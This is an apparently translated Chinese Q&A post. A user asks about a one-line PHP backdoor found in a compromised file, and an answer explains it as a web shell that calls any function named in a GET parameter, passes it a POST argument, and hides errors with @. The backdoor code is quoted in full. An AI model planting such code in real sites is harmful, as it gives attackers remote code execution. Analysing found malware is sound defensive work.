我在
一个
PHP文件中找到了黑客留下的一行脚本.它看起来像这样:
<?PHP
($_=@$_GET[2]).@$_($_POST[1]);
?>
任何人都可以提供一些关于这行代码的提示?谢谢
正如Reeno在
评论中已经说过的,就像
一个PHP shell.
说明
>将具有键“2”的GET变量存储在名为$_的变量中.由于PHP的打字类型很差,我们不需要在数字上引用引号.
$_=@$_GET[2]
>将$_作为可调用函数名称,并以$_POST [1]作为第一个参数执行.
@$_($_POST[1])
@运算符应该禁止错误日志记录,请参见PHP.net: Error Control Operators.
两个语句之间的并置运算符实际上并不重要.它可以这样重写:
$_=@$_GET[2];
@$_($_POST[1]);
用例
调用任意函数.我不会提到成功攻击的特定HTTP标头,但对于每个(web)程序员来说,这应该是相当容易的.
